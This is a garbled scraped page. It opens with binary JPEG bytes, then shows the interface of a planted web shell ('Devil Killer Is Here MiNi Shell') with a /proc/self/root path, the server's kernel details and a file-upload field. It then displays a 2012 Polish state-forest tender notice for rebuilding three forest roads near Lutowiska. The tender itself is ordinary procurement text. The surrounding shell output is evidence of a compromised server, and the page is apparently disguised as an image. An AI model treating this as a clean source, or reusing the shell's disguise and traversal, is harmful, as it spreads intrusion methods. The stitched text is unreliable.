JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120511/105067-N-2012.html

<p class="kh_header"><b>Lutowiska: Przebudowy dróg leśnych na terenie Nadleśnictwa Lutowiska (droga Caryńskie, droga Dwernik-Nasiczne, droga Czarna 1) oraz składów drewna w ciągu tych dróg. Zn. spr. NZ - 2710-5/12</b><br>
<b>Numer ogłoszenia: 105067 - 2012; data zamieszczenia: 11.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe Nadleśnictwo Lutowiska , Lutowiska 4, 38-713 Lutowiska, woj. podkarpackie, tel. 013 4610168 w. 43, faks 013 4610168.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krosno.lasy.gov.pl/web/lutowiska  tel.:  13 461 01 68,  fax:13 461 03 88</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> e-mail: lutowiska@krosno.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe - Nadleśnictwo Lutowiska.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowy dróg leśnych na terenie Nadleśnictwa Lutowiska (droga Caryńskie, droga Dwernik-Nasiczne, droga Czarna 1) oraz składów drewna w ciągu tych dróg. Zn. spr. NZ - 2710-5/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie przebudów dróg leśnych i składów drewna w ciągu dróg na terenie Nadleśnictwa Lutowiska które ze względów organizacyjnych podzielono na  trzy części:
Część I-    przebudowa drogi leśnej Caryńskie na  długość 1559 mb,   
                 przebiegającej przez teren leśnictw Dwernik i Nasiczne,
Część II-   przebudowa drogi leśnej Dwernik-Nasicznena  długość 2095 mb, 
                 przebiegającej przez teren leśnictw Dwernik i Nasiczne,
Część III-   przebudowa drogi leśnej Czarna 1 na  długość 1000 mb, 
                 przebiegającej przez teren leśnictwa Czarna.

Drogi są zlokalizowane na terenie gmin Lutowiska i Czarna w powiecie bieszczadzkim.

 Uwaga: Z uwagi na nie wyłączenie dróg leśnych z powierzchni leśnej, nie uwidoczniono ich na mapach ewidencyjnych, ani w rejestrze gruntów. W związku z tym, nie dołączono do Projektu budowlanego wypisów z powszechnej ewidencji gruntów i wyrysów z map ewidencyjnych. 
 
   
Zakres prac objętych przedmiotem zamówienia:

Część I - przebudowa drogi leśnej Caryńskie
Stan istniejący drogi :
W chwili obecnej droga posiada nawierzchnię gruntową. Przejazd nią jest utrudniony z powodu głębokich kolein, zastoisk wody gruntowej i opadowej. Brak odwodnienia powoduje napływ wody ze stoku na koryto i jego degradację.
Dane techniczne projektowanego odcinka drogi :
1.	długość 1559 mb
2.	szerokość jezdni 3,50m+poszerzenia, pobocza 2x0,75m
3.	odwodnienie za pomocą otwartych rowów drogowych oraz ścieku drogowego
4.	grupa nośności podłoża G3 (glina)
5.	Klasa drogi D

Stan projektowany przebudowy drogi zakłada:
1.	usunięcie zakrzaczeń, 
2.	wykonanie odhumusowania korony drogi,
3.	przebudowę i budowę nowych przepustów drogowych i studni wpadowych
4.	wykonanie odwodnienia drogi w postaci rowów odwadniających oraz ułożenia ścieku drogowego,
5.	wykonanie robót ziemnych (nasypów, wykopów, koryta),
6.	wykonanie nawierzchni utwardzonej na drodze (nawierzchnia tłuczniowa)
7.	przebudowę placów składowych
8.	zamontowanie oznakowań i pachołków drogowych
Konstrukcja nawierzchni drogowej:
1.10cm warstwa nawierzchni z tłucznia kamiennego zamknięta przy użyciu klińca i miału kamiennego drogowego,
2.18cm podbudowa z  tłucznia kamiennego, sortowanego
3. 20cm tłuczeń kamienny niesortowany
RAZEM 48 cm 

Odwodnienie drogi:
1.Odwodnienia drogi w postaci rowów odwadniających oraz ułożenia ścieku  drogowego,

2.Na projektowanym odcinku trasy przewiduje się wykonanie następujących przepustów:
1.	km 0+425.18	l=8.0m	  śr. 150cm     
2.	km 0+779.25	l=18.0m	  śr. 150cm     
3.	km 0+870.00	l=9.0m	  śr. 150cm     
4.	km 1+125.70	l=11.0m	  śr. 150cm     

W miejscach występowania wysokiego poziomu wody gruntowej w pasie drogowym należy zamontować sączki poprzeczne z kruszyw łamanych na głębokość nie mniejszą niż 0,6m od poziomu jezdni z odprowadzeniem wody na stok lub do rowu.
W jezdni drogowej zamontować wodospusty korytkowe drewniane w ilości 1szt. na każde 100 m odcinka drogi o spadku podłużnym do 5% i 2szt. na 100m drogi o spadku ponad 5%.

Przekrój poprzeczny drogi:
- zaprojektowano przekrój poprzeczny o nachyleniu 3% w kierunku spadku terenu

Bilans robót ziemnych na drodze:
1.	wykopy 8259,55 m3
2.	nasypy  8240,03 m3

Część II - przebudowa drogi leśnej Dwernik-Nasiczne
Stan istniejący i projektowany
W obecnym stanie droga leśna ma nawierzchnię gruntową, ponadnormatywne spadki podłużne, nie posiada rowów odwadniających.
Planuje się przebudowę polegającą na wbudowaniu warstw konstrukcyjnych z kruszywa kamiennego, łamanego- droga będzie miała nawierzchnię tłuczniową. Ponadto przebieg drogi zostanie skorygowany, celem złagodzenia spadków podłużnych i zostaną wykonane rowy podłużne-odwadniające oraz przepusty.
Dane techniczne:
1.	klasa drogi D,
2.	kategoria ruchu KR1,
3.	prędkość projektowa 30km/h,
4.	szerokość jezdni 3.50m
5.	szerokość obustronnych poboczy 2x0.75m,
6.	długość: 2.095km.
Przekrój poprzeczny i podłużny
Spadek poprzeczny drogi powinien wynosić 3% i być dostosowany do naturalnego nachylenia terenu. Projektowane spadki podłużne kształtują się między 0.3%-14%.
Konstrukcje nawierzchni
Konstrukcję nawierzchni na projektowanej jezdni, poboczach i zjazdach na szlaki zrywkowe oraz składy drewna przyjęto zgodnie z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999r w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie, na którą składają się:
1.	nawierzchnia z tłucznia klinowana  gr. 10cm,
2.	podbudowa z tłucznia gr. 18cm,
3.	tłuczeń niesortowany gr. 20cm.
9.	Place składowe
- nawierzchnia gruntowa z utwardzonymi tłuczniem wjazdami.
W KM 1+154.39-1+324.08 planuje się wykonać dodatkową drogę sz. 5.00m przebiegającą przez plac składowy o konstrukcji jezdni analogicznej jak drogi głównej.
Przy wjazdach na składy drewna i szlaki zrywkowe w jezdni drogowej projektuje się zamontowanie nawierzchni z płyt drogowych pełnych o długości odcinków nie przekraczających 6m.
Elementy odwodnienia
Wzdłuż projektowanej drogi należy wykonać rowy przydrożne, dna rowów powinny być umocnione prefabrykatami betonowymi (wg KPED 01.04) ułożonymi na warstwie pospółki gr. 15cm z podsypką cem.-piask. 1:4 gr. 5cm.
Przepusty pod drogą i zjazdami należy wykonać z rur karbowanych HDPE o60cm  ułożonymi na ławie fundamentowej żwirowo-piaskowej gr. 30cm, z zasypką co najmniej 30cm nad rurę - również z pospółki.
W miejscach występowania wysokiego poziomu wody gruntowej w pasie drogowym należy zamontować sączki poprzeczne z kruszyw łamanych na głębokość nie mniejszą niż 0,6m od poziomu jezdni z odprowadzeniem wody na stok lub do rowu.
W jezdni drogowej zamontować wodospusty korytkowe drewniane w ilości 1szt. na każde 100 m odcinka drogi o spadku podłużnym do 5% i 2szt. na 100m drogi o spadku ponad 5%.
Elementy bezpieczeństwa
We wskazanych lokalizacjach winny być zamontowany bariery energochłonne stalowe.
Umocnienia skarp
Skarpy wykopów i nasypów wyższe niż 2m planuje się umocnić poprzez obsianie uniwersalną mieszanką traw.

Część III - przebudowa drogi leśnej Czarna 1

Droga zlokalizowana  jest w Leśnictwie Czarna, gm.Czarna, powiat bieszczadzki. Rozpoczyna się w oddz. 30 Nadleśnictwa Lutowiska, na granicy pasa drogowego, drogi publicznej o nawierzchni asfaltowej. Początek drogi zlokalizowano na gruntach Lasów Państwowych, w km 0+008, na końcu utwardzonego (tłuczniowego) zjazdu z drogi publicznej. Kończy się w km 1+000, miejscem do nawracania.

Stan istniejący drogi :
Na całej swej długości droga przebiega przez tereny Lasów Państwowych.
Nawierzchnia gruntowa jest w bardzo złym stanie technicznym, na znacznej długości występują wysadziny, głębokie wyboje i koleiny.

Projektowane parametry techniczne drogi:

Długość drogi - 1 000 m;
Szerokość jezdni 3,5 m;
Szerokość pobocza - 0,75m x 2;
Spadki poprzeczne jezdni - 3%;
Spadki poprzeczne poboczy - 5 %;
Mijanki - 5 szt.;
Zjazdy -  szt. 2 - na szlaki zrywkowe;
Składy - 3 szt. - z tarczami zwrotnymi do nawracania pojazdów.
Klasa drogi wg kategorii - D

Projektowany zakres robót.

- wykonanie  robót ziemnych korekty łuków poziomych i pionowych oraz 
  ukształtowanie korony drogi;
- wykonanie podbudowy drogi z tłucznia niesortowanego, grub. 35cm;
- wykonanie warstwy jezdnej z tłucznia, grubości 12cm i szerokości 3,5m oraz poboczy tłuczniowych grub.25cm i szer.2x75cm 
- przebudowa uszkodzonych i budowa nowych przepustów O40cm i O60cm - łącznie     
  104m, 
- poprawa odwodnienia poprzez wykształcenie spadków poprzecznych jezdni,    
  odmulenie lub wykonanie nowych rowów przydrożnych, wykonanie sączków 
  poprzecznych pod konstrukcją jezdni, wykonanie wodospustów.
- przebudowa istniejących mijanek, zjazdów i składów.
- ustawienie 12 szt. znaków organizacji ruchu oraz 187 pachołków.
  Bilans robót ziemnych na drodze:
- wykopy 14709 m3
- nasypy  9464 m3


Uwagi ogólne:

We wszystkich miejscach występowania wysokiego poziomu wody gruntowej w pasie drogowym należy zamontować sączki poprzeczne z kruszyw łamanych na głębokość nie mniejszą niż 0,6m od poziomu jezdni z odprowadzeniem wody na stok lub do rowu.
Wymagane udzielenie gwarancji minimum 24 miesiące.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o 
których mowa w art. 67 ust. 1 pkt. 6 ustawy, polegających na powtórzeniu  prac będących przedmiotem zamówienia lub jego części o wartości do 50% 
wartości zamówienia podstawowego w okresie 3 lat od udzielenia zamówienia podstawowego (od terminu podpisania umowy).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.23-7, 45.23.31.42-6, 45.23.28.05-5, 45.23.32.90-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Pkt.  8.1. SIWZ. Zamawiający żąda zabezpieczenia oferty w postaci wadium w wysokości    
 
(na każdą część oddzielnie):  16 000,00 złotych.

Pkt. 8.2. SIWZ. Wadium może być wnoszone w jednej lub kilku      
     następujących  formach: 
        a) pieniądzu; 
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek wskazany przez Zamawiającego;
Numer rachunku bankowego na który należy wnosić wadium: 
 Bank BGŻ SA oddz. w Sanoku, 
 konto nr 26 2030 0045 1110 0000 0153 5050
z dopiskiem na  blankiecie przelewu, jakiego postępowania dotyczy,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e)  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
Pkt. 8.3. SIWZ.Wadia wnoszone w innych formach niż pieniądz należy deponować w oryginale 
w kasie w siedzibie Zamawiającego  do dnia 28.05.2012r., do godz. 14.00, 
przy czym Zamawiający dopuszcza złożenie  w/w  dokumentów za pomocą przesyłki pocztowej lub kurierskiej lub złożenie wraz z ofertą.
      Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób    
  reprezentacji Gwaranta (poręczyciela). Poręczenie, gwarancja musi być               
  podpisana   przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta   
  (poręczyciela). Podpis winien być sporządzony w sposób umożliwiający jego 
  identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem  
  imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe 
  zobowiązanie Gwaranta do wpłaty Zamawiającemu pełnej kwoty wadium w 
 okolicznościach określonych w art. 46 ust. 4 a i ust. 5 ustawy, na każde pisemne   
  żądanie zgłoszone przez Zamawiającego w terminie związania ofertą.

Pkt. 8.4. SIWZ. Wadium musi być wniesione najpóźniej do wyznaczonego terminu    
      składania ofert tj. do dnia 28.05.2012r, do godz. 14.00
      Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym 
      terminie znajdzie się na rachunku bankowym Zamawiającego.
Pkt. 8.5. SIWZ. Wykonawca, który nie wniesie wadium zostanie wykluczony z postępowania, 
     a jego oferta zostanie uznana za odrzuconą.
a) Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza. 
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego,
  b)  Zamawiający niezwłocznie zwraca wadium na wniosek Wykonawcy który 
       wycofał ofertę przed upływem terminu składania ofert,
  c)   Wadium Wykonawcy zostanie zatrzymane wraz z odsetkami w przypadku, gdy  
       Wykonawca:
 -  Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.      
     3 nie złożył dokumentów lub oświadczeń, o których mowa w art.  25 ust. 1 lub  
     pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn  nieleżących po  
     jego stronie,
-   odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach  
    określonych w ofercie, 
-   nie wniósł należytego zabezpieczenia umowy,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
     z przyczyn leżących po stronie Wykonawcy.
Pkt. 8.6. SIWZ. W przypadku wniesienia wadium w pieniądzu Wykonawca może wyrazić        
     zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna że warunek będzie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu  -  załącznik  nr 3a do SIWZ.


Ocena spełniania w/w warunków dokonana zostanie, w oparciu o informacje zawarte w dokumentach i oświadczeniach przedstawionych przez Wykonawcę w celu potwierdzenia spełniania warunków. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną robotę drogową o wartości nie niższej niż 400 tys. zł brutto, potwierdzoną referencjami, protokołami odbioru robót, opiniami, listami polecającymi stwierdzającymi,  że roboty zostały  wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 

        W przypadku gdy Wykonawca składa oferty na każdą część postępowania nie jest wymagane posiadanie w/w wiedzy i doświadczenia na każdą część oddzielnie.

        Ocena spełniania warunku  zostanie dokonana na podstawie  informacji i danych zawartych w dokumentach o których mowa w ppkt. 6.1. lit. b) SIWZ tj. w oparciu o wykaz robót budowlanych wykonanych należycie w okresie ostatnich 5 lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie oraz dokumenty potwierdzające że zamówienia te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

Ocena spełniania w/w warunków dokonana zostanie, w oparciu o informacje zawarte w dokumentach i oświadczeniach przedstawionych przez Wykonawcę w celu potwierdzenia spełniania warunków. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Poprzez posiadanie lub dysponowanie odpowiednim potencjałem technicznym Zamawiający rozumie zasoby sprzętowe pozostające w dyspozycji Wykonawcy gwarantujące wykonanie powierzonego zadania inwestycyjnego, złożone co najmniej z:
-  równiarki drogowej samojezdnej,
-  spycharki gąsienicowej o mocy min.100 KM,
-  walca drogowego o masie własnej 15t,
-  koparki podsiębiernej o poj. łyżki min. 0,4m3,
-  transportem samochodowym - minimum 3 samochody ciężarowe.

  W przypadku gdy Wykonawca składa oferty na każdą część postępowania nie jest wymagane dysponowanie wymienionym w/w potencjałem na każdą część osobno.
   Ocena warunku zostanie dokonana na podstawie informacji i danych zawartych w dokumentach o których mowa w ppkt. 6.1.  lit.  d)   SIWZ tj. w oparciu o: 
-  wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń jakimi dysponuje Wykonawca (Załączniki   7 do SIWZ) wraz z informacją o podstawie dysponowania tymi zasobami.

Ocena spełniania w/w warunków dokonana zostanie, w oparciu o informacje zawarte w dokumentach i oświadczeniach przedstawionych przez Wykonawcę w celu potwierdzenia spełniania warunków. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przez osoby zdolne do wykonania zamówienia uważa się dysponowanie do realizacji zamówienia co najmniej: ośmioma osobami zdolnymi do realizacji zamówienia tym jedną osobę posiadającą uprawnienia budowlane w zakresie kierowania robotami w specjalności drogowej, zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo  budowlane (Dz.U. z 2010 r. Nr 243 poz. 1623, ze zm.) albo odpowiadające im inne uprawnienie dopuszczone prawem lub dyrektywami.
                 

            W przypadku, gdy wskazane przez wykonawcę osoby są obywatelami państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej muszą one spełniać wymogi określone w art. 12a ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (tj. Dz.U. z 2010 r. Nr 243 poz. 1623, ze zm.).

       W przypadku gdy Wykonawca składa oferty na każdą część postępowania nie jest wymagane dysponowanie wymienionym w/w potencjałem na każdą część osobno.

         Ocena warunku zostanie dokonana na podstawie informacji i danych zawartych w dokumentach o których mowa w ppkt. 6.1.  lit. c) i  e) SIWZ tj. w oparciu o: 
- o wykaz osób które będą uczestniczyć w wykonywaniu zamówienia, a także zakresu wykonywanych przez nie czynności wraz z informacjami na temat ich kwalifikacji zawodowych oraz informacją o podstawie dysponowania tymi osobami oraz w oparciu o oświadczenie, że osoba/y/, które będą uczestniczyć w wykonywaniu zamówienia posiada/ją/ wymagane uprawnienia (Załączniki  nr 3b i 6 do SIWZ).


Ocena spełniania w/w warunków dokonana zostanie, w oparciu o informacje zawarte w dokumentach i oświadczeniach przedstawionych przez Wykonawcę w celu potwierdzenia spełniania warunków. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać:   

- że posiada środki finansowe  lub zdolność kredytową  albo obie te wielkości łącznie      
  w  wysokości nie mniejszej niż  300 tys. zł. 
- jest ubezpieczony od odpowiedzialności cywilnej (OC)   w zakresie prowadzonej 
  działalności związanej z przedmiotem zamówienia - na kwotę co najmniej 200 tys. 
   zł. 
      W  przypadku gdy Wykonawca składa oferty na każdą część postępowania nie jest wymagane posiadanie w/w ubezpieczenia OC oraz środków finansowych lub zdolności kredytowej na każdą część osobno.


        Ocena warunku w oparciu o załączony dokumenty  potwierdzający posiadanie ubezpieczenia oraz dokument/y/ potwierdzający posiadane środki finansowe lub zdolność kredytową  albo obie te wielkości łącznie.

Ocena spełniania w/w warunków dokonana zostanie, w oparciu o informacje zawarte w dokumentach i oświadczeniach przedstawionych przez Wykonawcę w celu potwierdzenia spełniania warunków. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

